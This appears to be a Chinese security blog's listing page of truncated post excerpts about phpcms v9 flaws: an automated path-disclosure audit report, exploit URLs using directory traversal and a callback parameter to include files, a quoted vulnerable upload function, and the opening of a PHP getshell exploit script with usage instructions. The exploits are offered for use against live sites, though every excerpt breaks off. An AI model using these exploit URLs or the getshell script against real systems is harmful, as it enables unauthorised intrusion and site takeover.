实用工具

漏洞播报:phpcms v9 30个爆路径方法集合

发表于4年前 | 作者: seay

1
以下内容为 【Seay源代码审计系统1.0】 信息泄露插件生成的自动审计报告,没有人为加工。 报告显示效果不好,请点击上面的【全屏阅读】查看 ,13号中午11点半会发一堆各种程序爆路径,比如discuz、phpwind、ecshop之类     Seay代码审计系统漏洞报告 审计结果:发现可疑漏洞总数:30个 ID 漏洞描述 文件路径 漏洞详细 1 存在敏感信息泄露漏洞 ......

实用工具

1
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。 Exp: http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck #包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。 Exp: http://www.php0day.com/phpcms/modules/attachment/templates/album_dir.tpl.php?author=b4dboy ......

代码审计 实用工具

1
漏洞文件:phpcms\modules\attachment\attachments.php      public function crop_upload() { if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {    $pic = $GLOBALS["HTTP_RAW_POST_DATA"];    if (isset($_GET['width']) && !empty($_GET['width'])) {    $width = intval($_GET['width']);    }    if (isset($_GET['height']) && !empty($_GET['heigh......

实用工具

phpcms v9再爆最新getshell漏洞

发表于4年前 | 作者: seay

1
phpcms v9 漏洞对环境要求比较大,得存在iis6 或者apache的解析漏洞才能利用、   ps:exp存在稍许问题,比如目标站为二级目录无法处理,请自行修改。 利用方式:php v9.php www.wooyun.in 1 1为asp 2为php 3为apache 的版本 ,使用前得摸清楚对方是什么环境 贴代码: <?php error_reporting(E_ERROR); set_time_limit(0); $pass=”wooyun.in”; print_r(‘ +——̵......